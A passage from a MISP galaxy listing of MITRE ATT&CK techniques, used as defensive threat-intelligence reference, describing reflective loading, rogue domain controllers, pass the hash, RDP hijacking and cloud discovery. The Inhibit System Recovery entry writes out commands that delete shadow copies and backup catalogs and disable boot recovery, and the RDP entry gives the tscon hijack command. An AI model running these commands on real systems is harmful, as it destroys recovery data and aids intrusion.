https://www.securityinbits.com/malware-analysis/parent-pid-spoofing-stage-2-ataware-ransomware-part-3

Reflective Code Loading - T1620

Adversaries may reflectively load code into a process in order to conceal the execution of malicious payloads. Reflective loading involves allocating then executing payloads directly within the memory of the process, vice creating a thread or process backed by a file path on disk. Reflectively loaded payloads may be compiled binaries, anonymous files (only present in RAM), or just snubs of fileless executable code (ex: position-independent shellcode).(Citation: Introducing Donut)(Citation: S1 Custom Shellcode Tool)(Citation: Stuart ELF Memory)(Citation: 00sec Droppers)(Citation: Mandiant BYOL)

Reflective code injection is very similar to [Process Injection](https://attack.mitre.org/techniques/T1055) except that the “injection” loads code into the processes’ own memory instead of that of a separate process. Reflective loading may evade process-based detections since the execution of the arbitrary code may be masked within a legitimate or otherwise benign process. Reflectively loading payloads directly into memory may also avoid creating files or other artifacts on disk, while also enabling malware to keep these payloads encrypted (or otherwise obfuscated) until execution.(Citation: Stuart ELF Memory)(Citation: 00sec Droppers)(Citation: Intezer ACBackdoor)(Citation: S1 Old Rat New Tricks)

The tag is: misp-galaxy:mitre-attack-pattern="Reflective Code Loading - T1620"

Table 3502. Table References
Links
https://attack.mitre.org/techniques/T1620
https://thewover.github.io/Introducing-Donut/
https://www.sentinelone.com/blog/building-a-custom-tool-for-shellcode-analysis/
https://magisterquis.github.io/2018/03/31/in-memory-only-elf-execution.html
https://0x00sec.org/t/super-stealthy-droppers/3715
https://www.mandiant.com/resources/bring-your-own-land-novel-red-teaming-technique
https://www.intezer.com/blog/research/acbackdoor-analysis-of-a-new-multiplatform-backdoor/
https://www.sentinelone.com/blog/teaching-an-old-rat-new-tricks/
https://www.mdsec.co.uk/2020/06/detecting-and-advancing-in-memory-net-tradecraft/

Rogue Domain Controller - T1207

Adversaries may register a rogue Domain Controller to enable manipulation of Active Directory data. DCShadow may be used to create a rogue Domain Controller (DC). DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a DC. (Citation: DCShadow Blog) Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys.

Registering a rogue DC involves creating a new server and nTDSDSA objects in the Configuration partition of the AD schema, which requires Administrator privileges (either Domain or local to the DC) or the KRBTGT hash. (Citation: Adsecurity Mimikatz Guide)

This technique may bypass system logging and security monitors such as security information and event management (SIEM) products (since actions taken on a rogue DC may not be reported to these sensors). (Citation: DCShadow Blog) The technique may also be used to alter and delete replication and other associated metadata to obstruct forensic analysis. Adversaries may also utilize this technique to perform [SID-History Injection](https://attack.mitre.org/techniques/T1134/005) and/or manipulate AD objects (such as accounts, access control lists, schemas) to establish backdoors for Persistence. (Citation: DCShadow Blog)

The tag is: misp-galaxy:mitre-attack-pattern="Rogue Domain Controller - T1207"

Table 3503. Table References
Links
https://attack.mitre.org/techniques/T1207
https://www.dcshadow.com/
https://adsecurity.org/?page_id=1821
https://github.com/shellster/DCSYNCMonitor
https://msdn.microsoft.com/en-us/library/ms677626.aspx
https://adds-security.blogspot.fr/2018/02/detecter-dcshadow-impossible.html

Software Deployment Tools - T1072

Adversaries may gain access to and use third-party software suites installed within an enterprise network, such as administration, monitoring, and deployment systems, to move laterally through the network. Third-party applications and software deployment systems may be in use in the network environment for administration purposes (e.g., SCCM, HBSS, Altiris, etc.).

Access to a third-party network-wide or enterprise-wide software system may enable an adversary to have remote code execution on all systems that are connected to such a system. The access may be used to laterally move to other systems, gather information, or cause a specific effect, such as wiping the hard drives on all endpoints.

The permissions required for this action vary by system configuration; local credentials may be sufficient with direct access to the third-party system, or specific domain credentials may be required. However, the system may require an administrative account to log in or to perform it’s intended purpose.

The tag is: misp-galaxy:mitre-attack-pattern="Software Deployment Tools - T1072"

Table 3504. Table References
Links
https://attack.mitre.org/techniques/T1072
https://capec.mitre.org/data/definitions/187.html

System Information Discovery - T1082

An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Tools such as [Systeminfo](https://attack.mitre.org/software/S0096) can be used to gather detailed system information. If running with privileged access, a breakdown of system data can be gathered through the <code>systemsetup</code> configuration tool on macOS. As an example, adversaries with user-level access can execute the <code>df -aH</code> command to obtain currently mounted disks and associated freely available space. [System Information Discovery](https://attack.mitre.org/techniques/T1082) combined with information gathered from other forms of discovery and reconnaissance can drive payload development and concealment.(Citation: OSX.FairyTale)(Citation: 20 macOS Common Tools and Techniques)

Infrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure allow access to instance and virtual machine information via APIs. Successful authenticated API calls can return data such as the operating system platform and status of a particular instance or the model view of a virtual machine.(Citation: Amazon Describe Instance)(Citation: Google Instances Resource)(Citation: Microsoft Virutal Machine API)

The tag is: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082"

Table 3505. Table References
Links
https://attack.mitre.org/techniques/T1082
https://capec.mitre.org/data/definitions/312.html
https://www.sentinelone.com/blog/trail-osx-fairytale-adware-playing-malware/
https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html
https://cloud.google.com/compute/docs/reference/rest/v1/instances
https://docs.microsoft.com/en-us/rest/api/compute/virtualmachines/get

Windows Remote Management - T1028

Windows Remote Management (WinRM) is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services). (Citation: Microsoft WinRM) It may be called with the <code>winrm</code> command or by any number of programs such as PowerShell. (Citation: Jacobsen 2014)

The tag is: misp-galaxy:mitre-attack-pattern="Windows Remote Management - T1028"

View relationships graph

Windows Remote Management - T1028 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Windows Remote Management - T1021.006" with estimative-language:likelihood-probability="almost-certain"

Table 3506. Table References
Links
https://attack.mitre.org/techniques/T1028
https://capec.mitre.org/data/definitions/555.html
http://msdn.microsoft.com/en-us/library/aa384426
https://www.slideshare.net/kieranjacobsen/lateral-movement-with-power-shell-2
https://medium.com/threatpunter/detecting-lateral-movement-using-sysmon-and-splunk-318d3be141bc

Commonly Used Port - T1043

This technique has been deprecated. Please use [Non-Standard Port](https://attack.mitre.org/techniques/T1571) where appropriate.

Adversaries may communicate over a commonly used port to bypass firewalls or network detection systems and to blend with normal network activity to avoid more detailed inspection. They may use commonly open ports such as

TCP:80 (HTTP)
TCP:443 (HTTPS)
TCP:25 (SMTP)
TCP/UDP:53 (DNS)

They may use the protocol associated with the port or a completely different protocol.

For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), examples of common ports are

TCP/UDP:135 (RPC)
TCP/UDP:22 (SSH)
TCP/UDP:3389 (RDP)

The tag is: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043"

Table 3507. Table References
Links
https://attack.mitre.org/techniques/T1043
https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

Private whois services - T1305

Every domain registrar maintains a publicly viewable database that displays contact information for every registered domain. Private 'whois' services display alternative information, such as their own company data, rather than the owner of the domain. (Citation: APT1)

The tag is: misp-galaxy:mitre-attack-pattern="Private whois services - T1305"

Table 3508. Table References
Links
https://attack.mitre.org/techniques/T1305

Security Software Discovery - T1063

Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on the system. This may include things such as local firewall rules and anti-virus. Adversaries may use the information from [Security Software Discovery](https://attack.mitre.org/techniques/T1063) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Windows

Mac

It’s becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software.

The tag is: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1063"

View relationships graph

Security Software Discovery - T1063 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"

Table 3509. Table References
Links
https://attack.mitre.org/techniques/T1063

Test physical access - T1360

An adversary can test physical access options in preparation for the actual attack. This could range from observing behaviors and noting security precautions to actually attempting access. (Citation: OCIAC Pre Incident Indicators) (Citation: NewsAgencySpy)

The tag is: misp-galaxy:mitre-attack-pattern="Test physical access - T1360"

Table 3510. Table References
Links
https://attack.mitre.org/techniques/T1360

Exploit OS Vulnerability - T1404

A malicious app can exploit unpatched vulnerabilities in the operating system to obtain escalated privileges.

The tag is: misp-galaxy:mitre-attack-pattern="Exploit OS Vulnerability - T1404"

Table 3511. Table References
Links
https://attack.mitre.org/techniques/T1404
https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-26.html

Exploit TEE Vulnerability - T1405

A malicious app or other attack vector could be used to exploit vulnerabilities in code running within the Trusted Execution Environment (TEE) (Citation: Thomas-TrustZone). The adversary could then obtain privileges held by the TEE potentially including the ability to access cryptographic keys or other sensitive data (Citation: QualcommKeyMaster). Escalated operating system privileges may be first required in order to have the ability to attack the TEE (Citation: EkbergTEE). If not, privileges within the TEE can potentially be used to exploit the operating system (Citation: laginimaineb-TEE).

The tag is: misp-galaxy:mitre-attack-pattern="Exploit TEE Vulnerability - T1405"

Table 3512. Table References
Links
https://attack.mitre.org/techniques/T1405
https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-27.html
https://usmile.at/symposium/program/2015/thomas-holmes
https://bits-please.blogspot.in/2016/06/extracting-qualcomms-keymaster-keys.html
https://usmile.at/symposium/program/2015/ekberg
http://bits-please.blogspot.co.il/2016/05/war-of-worlds-hijacking-linux-kernel.html

Network Service Scanning - T1046

Within cloud environments, adversaries may attempt to discover services running on other cloud hosts. Additionally, if the cloud environment is connected to a on-premises environment, adversaries may be able to identify services running on non-cloud systems as well.

The tag is: misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046"

Table 3513. Table References
Links
https://attack.mitre.org/techniques/T1046
https://capec.mitre.org/data/definitions/300.html

Proxy Through Victim - T1604

Adversaries may use a compromised device as a proxy server to the Internet. By utilizing a proxy, adversaries hide the true IP address of their C2 server and associated infrastructure from the destination of the network traffic. This masquerades an adversary’s traffic as legitimate traffic originating from the compromised device, which can evade IP-based restrictions and alerts on certain services, such as bank accounts and social media websites.(Citation: Threat Fabric Exobot)

The most common type of proxy is a SOCKS proxy. It can typically be implemented using standard OS-level APIs and 3rd party libraries with no indication to the user. On Android, adversaries can use the Proxy API to programmatically establish a SOCKS proxy connection, or lower-level APIs to interact directly with raw sockets.

The tag is: misp-galaxy:mitre-attack-pattern="Proxy Through Victim - T1604"

Table 3514. Table References
Links
https://attack.mitre.org/techniques/T1604
https://www.threatfabric.com/blogs/exobot_android_banking_trojan_on_the_rise.html

Windows Management Instrumentation - T1047

Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM) and [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) (WinRM). (Citation: MSDN WMI) Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS. (Citation: MSDN WMI) (Citation: FireEye WMI 2015)

An adversary can use WMI to interact with local and remote systems and use it as a means to execute various behaviors, such as gathering information for Discovery as well as remote Execution of files as part of Lateral Movement. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015)

The tag is: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047"

Table 3515. Table References
Links
https://attack.mitre.org/techniques/T1047
https://msdn.microsoft.com/en-us/library/aa394582.aspx
https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf
https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/sans-dfir-2015.pdf

Inhibit System Recovery - T1490

Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) Operating systems may contain features that can help fix corrupted systems, such as a backup catalog, volume shadow copies, and automatic repair features. Adversaries may disable or delete system recovery features to augment the effects of [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486).(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017)

A number of native Windows utilities have been used by adversaries to disable or delete system recovery features:

<code>vssadmin.exe</code> can be used to delete all volume shadow copies on a system - <code>vssadmin.exe delete shadows /all /quiet</code>
[Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) can be used to delete volume shadow copies - <code>wmic shadowcopy delete</code>
<code>wbadmin.exe</code> can be used to delete the Windows Backup Catalog - <code>wbadmin.exe delete catalog -quiet</code>
<code>bcdedit.exe</code> can be used to disable automatic Windows recovery features by modifying boot configuration data - <code>bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no</code>

The tag is: misp-galaxy:mitre-attack-pattern="Inhibit System Recovery - T1490"

Table 3516. Table References
Links
https://attack.mitre.org/techniques/T1490
https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html

Server Software Component - T1505

Adversaries may abuse legitimate extensible development features of servers to establish persistent access to systems. Enterprise server applications may include features that allow developers to write and install software or scripts to extend the functionality of the main application. Adversaries may install malicious components to extend and abuse server applications.

The tag is: misp-galaxy:mitre-attack-pattern="Server Software Component - T1505"

Table 3517. Table References
Links
https://attack.mitre.org/techniques/T1505
https://www.us-cert.gov/ncas/alerts/TA15-314A

Archive Collected Data - T1560

An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.

Both compression and encryption are done prior to exfiltration, and can be performed using a utility, 3rd party library, or custom method.

The tag is: misp-galaxy:mitre-attack-pattern="Archive Collected Data - T1560"

Table 3518. Table References
Links
https://attack.mitre.org/techniques/T1560
https://en.wikipedia.org/wiki/List_of_file_signatures

Web Session Cookie - T1506

Authentication cookies are commonly used in web applications, including cloud-based services, after a user has authenticated to the service so credentials are not passed and re-authentication does not need to occur as frequently. Cookies are often valid for an extended period of time, even if the web application is not actively used. After the cookie is obtained through [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539), the adversary then imports the cookie into a browser they control and is able to use the site or application as the user for as long as the session cookie is active. Once logged into the site, an adversary can access sensitive information, read email, or perform actions that the victim account has permissions to perform.

There have been examples of malware targeting session cookies to bypass multi-factor authentication systems.(Citation: Unit 42 Mac Crypto Cookies January 2019)

The tag is: misp-galaxy:mitre-attack-pattern="Web Session Cookie - T1506"

View relationships graph

Web Session Cookie - T1506 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Web Session Cookie - T1550.004" with estimative-language:likelihood-probability="almost-certain"

Table 3519. Table References
Links
https://attack.mitre.org/techniques/T1506
https://wunderwuzzi23.github.io/blog/passthecookie.html
https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/

Uncommonly Used Port - T1065

Adversaries may conduct C2 communications over a non-standard port to bypass proxies and firewalls that have been improperly configured.

The tag is: misp-galaxy:mitre-attack-pattern="Uncommonly Used Port - T1065"

View relationships graph

Uncommonly Used Port - T1065 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Non-Standard Port - T1571" with estimative-language:likelihood-probability="almost-certain"

Table 3520. Table References
Links
https://attack.mitre.org/techniques/T1065
https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

Network Information Discovery - T1507

Adversaries may use device sensors to collect information about nearby networks, such as Wi-Fi and Bluetooth.

The tag is: misp-galaxy:mitre-attack-pattern="Network Information Discovery - T1507"

Table 3521. Table References
Links
https://attack.mitre.org/techniques/T1507

Pass the Hash - T1075

Pass the hash (PtH) is a method of authenticating as a user without having access to the user’s cleartext password. This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash. In this technique, valid password hashes for the account being used are captured using a Credential Access technique. Captured hashes are used with PtH to authenticate as that user. Once authenticated, PtH may be used to perform actions on local or remote systems.

Windows 7 and higher with KB2871997 require valid domain user credentials or RID 500 administrator hashes. (Citation: NSA Spotting)

The tag is: misp-galaxy:mitre-attack-pattern="Pass the Hash - T1075"

View relationships graph

Pass the Hash - T1075 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Pass the Hash - T1550.002" with estimative-language:likelihood-probability="almost-certain"

Table 3522. Table References
Links
https://attack.mitre.org/techniques/T1075
https://capec.mitre.org/data/definitions/644.html
https://apps.nsa.gov/iaarchive/library/reports/spotting-the-adversary-with-windows-event-log-monitoring.cfm

Lateral Tool Transfer - T1570

Adversaries may transfer tools or other files between systems in a compromised environment. Files may be copied from one system to another to stage adversary tools or other files over the course of an operation. Adversaries may copy files laterally between internal victim systems to support lateral movement using inherent file sharing protocols such as file sharing over SMB to connected network shares or with authenticated connections with [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) or [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001). Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.

The tag is: misp-galaxy:mitre-attack-pattern="Lateral Tool Transfer - T1570"

Table 3523. Table References
Links
https://attack.mitre.org/techniques/T1570

Suppress Application Icon - T1508

A malicious application could suppress its icon from being displayed to the user in the application launcher to hide the fact that it is installed, and to make it more difficult for the user to uninstall the application. Hiding the application’s icon programmatically does not require any special permissions.

This behavior has been seen in the BankBot/Spy Banker family of malware.(Citation: android-trojan-steals-paypal-2fa)(Citation: sunny-stolen-credentials)(Citation: bankbot-spybanker)

The tag is: misp-galaxy:mitre-attack-pattern="Suppress Application Icon - T1508"

Table 3524. Table References
Links
https://attack.mitre.org/techniques/T1508
https://www.welivesecurity.com/2018/12/11/android-trojan-steals-money-paypal-accounts-2fa/
https://www.welivesecurity.com/2017/02/22/sunny-chance-stolen-credentials-malicious-weather-app-found-google-play/
https://www.cyber.nj.gov/threat-profiles/android-malware-variants/bankbot-spybanker

Cloud Infrastructure Discovery - T1580

An adversary may attempt to discover resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.

Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a <code>DescribeInstances</code> API within the Amazon EC2 API that can return information about one or more instances within an account, the <code>ListBuckets</code> API that returns a list of all buckets owned by the authenticated sender of the request, or the <code>GetPublicAccessBlock</code> API to retrieve access block configuration for a bucket (Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block). Similarly, GCP’s Cloud SDK CLI provides the <code>gcloud compute instances list</code> command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure’s CLI command <code>az vm list</code> lists details of virtual machines.(Citation: Microsoft AZ CLI)

An adversary may enumerate resources using a compromised user’s access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020)An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as <code>DescribeDBInstances</code> to determine size, owner, permissions, and network ACLs of database resources. (Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.

The tag is: misp-galaxy:mitre-attack-pattern="Cloud Infrastructure Discovery - T1580"

Table 3525. Table References
Links
https://attack.mitre.org/techniques/T1580
https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html
https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html
https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetPublicAccessBlock.html
https://cloud.google.com/sdk/gcloud/reference/compute/instances/list
https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
https://expel.io/blog/finding-evil-in-aws/
https://content.fireeye.com/m-trends/rpt-m-trends-2020
https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DescribeDBInstances.html

Uncommonly Used Port - T1509

Adversaries may use non-standard ports to exfiltrate information.

The tag is: misp-galaxy:mitre-attack-pattern="Uncommonly Used Port - T1509"

Table 3526. Table References
Links
https://attack.mitre.org/techniques/T1509

Forge Web Credentials - T1606

Adversaries may forge credential materials that can be used to gain access to web applications or Internet services. Web applications and services (hosted in cloud SaaS environments or on-premise servers) often use session cookies, tokens, or other materials to authenticate and authorize user access.

Adversaries may generate these credential materials in order to gain access to web resources. This differs from [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539), [Steal Application Access Token](https://attack.mitre.org/techniques/T1528), and other similar behaviors in that the credentials are new and forged by the adversary, rather than stolen or intercepted from legitimate users. The generation of web credentials often requires secret values, such as passwords, [Private Keys](https://attack.mitre.org/techniques/T1552/004), or other cryptographic seed values.(Citation: GitHub AWS-ADFS-Credential-Generator)

Once forged, adversaries may use these web credentials to access resources (ex: [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550)), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Pass The Cookie)(Citation: Unit 42 Mac Crypto Cookies January 2019)(Citation: Microsoft SolarWinds Customer Guidance)

The tag is: misp-galaxy:mitre-attack-pattern="Forge Web Credentials - T1606"

Table 3527. Table References
Links
https://attack.mitre.org/techniques/T1606
https://github.com/damianh/aws-adfs-credential-generator
https://wunderwuzzi23.github.io/blog/passthecookie.html
https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/
https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/

Remote Desktop Protocol - T1076

Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS). (Citation: TechNet Remote Desktop Services) There are other implementations and third-party tools that provide graphical access [Remote Services](https://attack.mitre.org/techniques/T1021) similar to RDS.

Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries will likely use Credential Access techniques to acquire credentials to use with RDP. Adversaries may also use RDP in conjunction with the [Accessibility Features](https://attack.mitre.org/techniques/T1015) technique for Persistence. (Citation: Alperovitch Malware)

Adversaries may also perform RDP session hijacking which involves stealing a legitimate user’s remote session. Typically, a user is notified when someone else is trying to steal their session and prompted with a question. With System permissions and using Terminal Services Console, <code>c:\windows\system32\tscon.exe [session number to be stolen]</code>, an adversary can hijack a session without the need for credentials or prompts to the user. (Citation: RDP Hijacking Korznikov) This can be done remotely or locally and with active or disconnected sessions. (Citation: RDP Hijacking Medium) It can also lead to [Remote System Discovery](https://attack.mitre.org/techniques/T1018) and Privilege Escalation by stealing a Domain Admin or higher privileged account session. All of this can be done by using native Windows commands, but it has also been added as a feature in RedSnarf. (Citation: Kali Redsnarf)

The tag is: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1076"

View relationships graph

Remote Desktop Protocol - T1076 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"

Table 3528. Table References
Links
https://attack.mitre.org/techniques/T1076
https://capec.mitre.org/data/definitions/555.html
https://technet.microsoft.com/en-us/windowsserver/ee236407.aspx
http://blog.crowdstrike.com/adversary-tricks-crowdstrike-treats/
http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html
https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6
https://github.com/nccgroup/redsnarf

Container Administration Command - T1609

Adversaries may abuse a container administration service to execute commands within a container. A container administration service such as the Docker daemon, the Kubernetes API server, or the kubelet may allow remote management of containers within an environment.(Citation: Docker Daemon CLI)(Citation: Kubernetes API)(Citation: Kubernetes Kubelet)

In Docker, adversaries may specify an entrypoint during container deployment that executes a script or command, or they may use a command such as <code>docker exec</code> to execute a command within a running container.(Citation: Docker Entrypoint)(Citation: Docker Exec) In Kubernetes, if an adversary has sufficient permissions, they may gain remote execution in a container in the cluster via interaction with the Kubernetes API server, the kubelet, or by running a command such as <code>kubectl exec</code>.(Citation: Kubectl Exec Get Shell)

The tag is: misp-galaxy:mitre-attack-pattern="Container Administration Command - T1609"

Table 3529. Table References
Links
https://attack.mitre.org/techniques/T1609
https://docs.docker.com/engine/reference/commandline/dockerd/
https://kubernetes.io/docs/concepts/overview/kubernetes-api/
https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet/
https://docs.docker.com/engine/reference/run/#entrypoint-default-command-to-execute-at-runtime
https://docs.docker.com/engine/reference/commandline/exec/
https://kubernetes.io/docs/tasks/debug-application-cluster/get-shell-running-container/

NTFS File Attributes - T1096

Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. (Citation: SpectorOps Host-Based Jul 2017) Within MFT entries are file attributes, (Citation: Microsoft NTFS File Attributes Aug 2010) such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files). (Citation: SpectorOps Host-Based Jul 2017) (Citation: Microsoft File Streams) (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)

The tag is: misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1096"

View relationships graph

NTFS File Attributes - T1096 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1564.004" with estimative-language:likelihood-probability="almost-certain"

Table 3530. Table References
Links
https://attack.mitre.org/techniques/T1096
https://posts.specterops.io/host-based-threat-modeling-indicator-design-a9dbbb53d5ea
https://blogs.technet.microsoft.com/askcore/2010/08/25/ntfs-file-attributes/
http://msdn.microsoft.com/en-us/library/aa364404
https://blog.malwarebytes.com/101/2015/07/introduction-to-alternate-data-streams/
https://blogs.technet.microsoft.com/askcore/2013/03/24/alternate-data-streams-in-ntfs/
http://journeyintoir.blogspot.com/2012/12/extracting-zeroaccess-from-ntfs.html
https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
https://www.symantec.com/connect/articles/what-you-need-know-about-alternate-data-streams-windows-your-data-secure-can-you-restore

Permission Groups Discovery - T1069

Adversaries may attempt to find group and permission settings. This information can help adversaries determine which user accounts and groups are available, the membership of users in particular groups, and which users and groups have elevated permissions.

The tag is: misp-galaxy:mitre-attack-pattern="Permission Groups Discovery - T1069"

Table 3531. Table References
Links
https://attack.mitre.org/techniques/T1069
https://capec.mitre.org/data/definitions/576.html
https://kubernetes.io/docs/reference/access-authn-authz/authorization/

Windows Admin Shares - T1077

Adversaries may use this technique in conjunction with administrator-level [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely access a networked system over server message block (SMB) (Citation: Wikipedia SMB) to interact with systems using remote procedure calls (RPCs), (Citation: TechNet RPC) transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are [Scheduled Task](https://attack.mitre.org/techniques/T1053), [Service Execution](https://attack.mitre.org/techniques/T1035), and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). Adversaries can also use NTLM hashes to access administrator shares on systems with [Pass the Hash](https://attack.mitre.org/techniques/T1075) and certain configuration and patch levels. (Citation: Microsoft Admin Shares)

The [Net](https://attack.mitre.org/software/S0039) utility can be used to connect to Windows admin shares on remote systems using <code>net use</code> commands with valid credentials. (Citation: Technet Net Use)

The tag is: misp-galaxy:mitre-attack-pattern="Windows Admin Shares - T1077"

View relationships graph

Windows Admin Shares - T1077 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"

Table 3532. Table References
Links
https://attack.mitre.org/techniques/T1077
https://capec.mitre.org/data/definitions/561.html
https://en.wikipedia.org/wiki/Server_Message_Block
https://technet.microsoft.com/en-us/library/cc787851.aspx
http://support.microsoft.com/kb/314984
https://technet.microsoft.com/bb490717.aspx
https://docs.microsoft.com/en-us/archive/blogs/jepayne/tracking-lateral-movement-part-one-special-groups-and-specific-service-accounts
https://docs.microsoft.com/en-us/archive/blogs/jepayne/monitoring-what-matters-windows-event-forwarding-for-everyone-even-if-you-already-have-a-siem
https://medium.com/threatpunter/detecting-lateral-movement-using-sysmon-and-splunk-318d3be141bc

Pass the Ticket - T1097

Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account’s password. Kerberos authentication can be used as the first step to lateral movement to a remote system.

In this technique, valid Kerberos tickets for [Valid Accounts](https://attack.mitre.org/techniques/T1078) are captured by [Credential Dumping](https://attack.mitre.org/techniques/T1003). A user’s service tickets or ticket granting ticket (TGT) may be obtained, depending on the level of access. A service ticket allows for access to a particular resource, whereas a TGT can be used to request service tickets from the Ticket Granting Service (TGS) to access any resource the user has privileges to access. (Citation: ADSecurity AD Kerberos Attacks) (Citation: GentilKiwi Pass the Ticket)

Silver Tickets can be obtained for services that use Kerberos as an authentication mechanism and are used to generate tickets to access that particular resource and the system that hosts the resource (e.g., SharePoint). (Citation: ADSecurity AD Kerberos Attacks)

